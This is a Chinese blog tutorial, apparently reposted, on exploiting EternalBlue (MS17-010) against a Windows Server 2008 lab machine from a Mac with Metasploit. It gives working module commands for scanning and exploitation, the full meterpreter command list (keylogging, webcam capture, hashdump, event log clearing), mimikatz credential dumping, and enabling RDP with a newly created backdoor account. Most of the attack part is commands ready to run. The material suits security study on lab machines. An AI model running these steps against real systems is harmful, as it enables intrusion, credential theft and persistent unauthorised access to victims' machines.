永恒之蓝实战教程之Mac通过Metasploit攻击Server2008的详细过程
作者:夜猫逐梦 发布时间:2022-08-01 05:41:26
导读
准备一个Server2008,通过
Metasploit
获取system访问权限,进入meterpreter
交互界面。
通过shell
命令,连通目标机器的cmd,查看目标系统信息。
然后通过mimikatz
查看系统用户。
最后通过run enable_rdp
开启控制机远程桌面并创建用户。
开发环境
版本号 | 描述 | |
---|---|---|
MacOS(攻击机器) | 11.5 | |
Windows(目标机器) | Server 2008 R2 x64 SP1 | |
Metasploit | 6.2.15-dev-1b985447c5dccba9be98ed7cef60eecf487b9ec5 | |
Microsoft_Remote_Desktop | 10.7.9 |
基础知识
永恒之蓝
SMB(Server Message Block)
又称网络文件共享系统(Common Internet File System,缩写为CIFS)
,一种应用层网络传输协议,主要功能是使网络上的机器能够共享计算机文件、打印机、串行端口和通讯等资源。它也提供经认证的行程间通信机能。
永恒之蓝”(Eternalblue)漏洞编号MS17-010 泄露自
美国国家安全局(NSA)
黑客工具包
该漏洞利用工具针对TCP 445端口(Server Message Block/SMB)的文件分享协议进行攻击,可以获取系统最高权限system
漏洞影响:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0等
Metasploit
常用命令
show exploits – 查看所有可用的渗透攻击程序代码
show auxiliary – 查看所有可用的辅助攻击工具
show options – 查看该模块所有可用选项
show payloads – 查看该模块适用的所有载荷代码
show targets – 查看该模块适用的攻击目标类型
search – 根据关键字搜索某模块
info – 显示某模块的详细信息
use – 进入使用某渗透攻击模块
back – 回退
set/unset – 设置/禁用模块中的某个参数
setg/unsetg – 设置/禁用适用于所有模块的全局参数
save – 将当前设置值保存下来,以便下次启动MSF终端时仍可使用
meterpreter
meterpreter 是一个高级的,动态的,可拓展的Payload,出现meterpreter 我们就有了shell,可以执行非常多的命令,去操控远端设备。
执行命令:?或者help,显示出可以执行的全部命令。
我们会用到upload
、run
等命令。
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
pivot Manage pivot listeners
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
secure (Re)Negotiate TLV packet encryption on the session
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session
ssl_verify Modify the SSL certificate verification setting
transport Manage the transport mechanisms
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
del Delete the specified file
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcat Read the contents of a local file to the screen
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical drives
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getsid Get the SID of the user that the server is running as
getuid Get the user that the server is running as
kill Terminate a process
localtime Displays the target system local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyboard_send Send keystrokes
keyevent Send key events
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
mouse Send mouse events
screenshare Watch the remote user desktop in real time
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play a waveform audio file (.wav) on the target system
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
准备工作
虚拟机安装Server2008
系统下载地址:https://msdn.itellyou.cn/
安装:略~~~
Mac上安装Metasploit
下载安装:
【可忽略】官网地址:https://www.metasploit.com/download
【可忽略】通过官网,只能访问到github的wiki页面,wiki页面又让跳转到官网的帮助文档页面:https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html
帮助页面中,我们可以看到支持各种平台,其中Mac平台是通过https://osx.metasploit.com/metasploitframework-latest.pkg
下载,直接安装即可。
初始化、运行:
# 切换到工作目录
cd /opt/metasploit-framework/bin/
# 一定要这么做,否则连接的数据库一定有问题。
./msfdb init
# 运行Metasploit开控台(运行一次会将路径设置到环境变量中,以后就可以直接访问该目录中所有命令了)
./msfconsole
Mac上安装远程桌面客户端Microsoft Remote Desktop
通过App Store
是无法搜索到Microsoft Remote Desktop
的;通过https://apps.apple.com/tw/app/microsoft-remote-desktop/id1295203466页面跳转到App Store,会提示地区尚不提供此App
。
这里,我们通过该地址直接下载https://mac.softpedia.com/get/Utilities/Microsoft-Remote-Desktop-Connection.shtml,下载的文件名为Microsoft_Remote_Desktop_10.7.9_installer.pkg
,双击即可安装。
下面两个下载地址需要登录,有点麻烦
玩转苹果下载:https://www.ifunmac.com/?s=Microsoft+Remote+Desktop+for+Mac&x=0&y=0未来Mac下载: https://mac.orsoon.com/search/Microsoft%20Remote%20Desktop%20for%20Ma_mac_1.html
通过Metasploit,获取靶机shell 搜索17-010
相关漏洞插件
msf6 > search 17-010
使用scanner辅助验证插件扫描漏洞
# 选中插件
use auxiliary/scanner/smb/smb_ms17_010
# 设置目录机器,单个ip验证(虚拟机中的Server2008)
set RHOSTS 192.168.1.216
# 开始执行漏洞扫描
run
效果如下:
ps:show options
是显示这个插件相关的参数,在Required这一栏下面是yes的表示必填参数。
ps:
参数RHOSTS
和THREADS
:
# RHOSTS这个参数可以设置一个目标网段,进行扫描测试
set RHOSTS 192.168.29.1/24
# 设置扫描线程,插件默认是1,这里设置为20:
set THREADS 20
exploit获取shell
使用exploit模块来进行攻击测试
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.1
set THREADS 10
run
效果如下:
执行命令shell
即可进入cmd命令行:
ps:
在windows命令行输入 chcp 65001 解决中文乱码
利用mimikatz模块,爆破靶机账号密码
# 加载mimikatz
load mimikatz
# 读取内存中存放的账号密码
creds_wdigest
效果如下:
利用meterpreter模块,开启控制机远程桌面并创建用户
开启rdp
# 1,启动远程桌面(通过爆破出来的密码登录)
meterpreter > run post/windows/manage/enable_rdp
# 2,创建一个新用户来远程连接 windows 桌面
meterpreter > run post/windows/manage/enable_rdp username=root password=root@toor.com
通过Microsoft Remote Desktop远程连接Server2008
ps:
kali连接windows桌面rdesktop 192.168.1.216
参考资料
mac下安装Metasploit https://www.kali.org/get-kali/#kali-bare-metal
来源:https://blog.csdn.net/kinghzking/article/details/126554664
猜你喜欢
- 社会上的任何人,都不愿意自己给人留下难以交往的印象,就算是那些冷漠、寡情的人他们也在不断地寻求一种通道,达到与他人的交流和沟通。如果,在你与
- 使用opencv对图像进行编码,一方面是图像二进制传输的需要,另一方面对图像压缩。以jpeg压缩为例:1、转为二进制编码img = cv2.
- 本文实例讲述了PHP自定义函数用法。分享给大家供大家参考,具体如下:Demo1.php<?php //标准函数,内置函数
- 环境pip install opencv-python==3.4.2.16pip install opencv-contrib-python
- 首先创建一个新的python3记录,之后在开始位置输入以下语句并执行:import plotlyimport plotly.offline
- 本文实例讲述了Python面向对象封装操作。分享给大家供大家参考,具体如下:目标封装小明爱跑步存放家具01. 封装封装 是面向对象编程的一大
- 现在市场上的OA基本上可归结为两大阵营,即php阵营和java阵营。但对接触Oa不久的用户来说,看到的往往只是它们的表相,只是明显的价格差异
- asp日期转换星座函数,参数是日期型function astro(birth)astro=""if
- 将一个 awk 脚本移植到 Python 主要在于代码风格而不是转译。脚本是解决问题的有效方法,而 awk 是编写脚本的出色语言。它特别擅长
- 我会随便说,C++ 近年来开始"抄袭" Python 么?我只会说,我在用 C++ 来学习 Python.不信?来跟着我
- linux系统使用python获取cpu信息脚本分享#!/usr/bin/env Pythonfrom __future__ import
- 本文实例为大家分享了python实现AES加密和解密的具体代码,供大家参考,具体内容如下参考:python实现AES加密和解密AES加密算法
- 说明:最近在B站看一些材料力学视频时候,感觉有一些分集狂魔的分集真的很恐怖,有的甚至上百集,因此决定写个小脚本每次分析下到底这个系列视频到底
- python数据结构之 列表和元组序列:序列是一种数据结构,它包含的元素都进行了编号(从0开始)。典型的序列包括列表、字符串和元组。其中,列
- 环境:Python3.6.4 + pandas 0.22主要是DataFrame.apply函数的应用,如果设置axis参数为1则每次函数每
- 如何在本地机器上创建缓存?用法到是很简单,只需先创建Stream对象的实例,然后开始写入数据即可: Dim str&n
- 支付宝支付正式环境:用营业执照,申请商户号,appid测试环境:沙箱环境:https://openhome.alipay.com/platf
- OpenCV是应用最被广泛的的开源视觉库。他允许你使用很少的代码来检测图片或视频中的人脸。这里有一些互联网上的教程来阐述怎么在OpenCV中
- 废话不多说啦,直接看代码吧!tf.concatt1 = [[1, 2, 3], [4, 5, 6]]t2 = [[7, 8, 9], [10
- Pandas count()与values_count()用法count()values_count()在指定的统计的列名上结果多了该列:对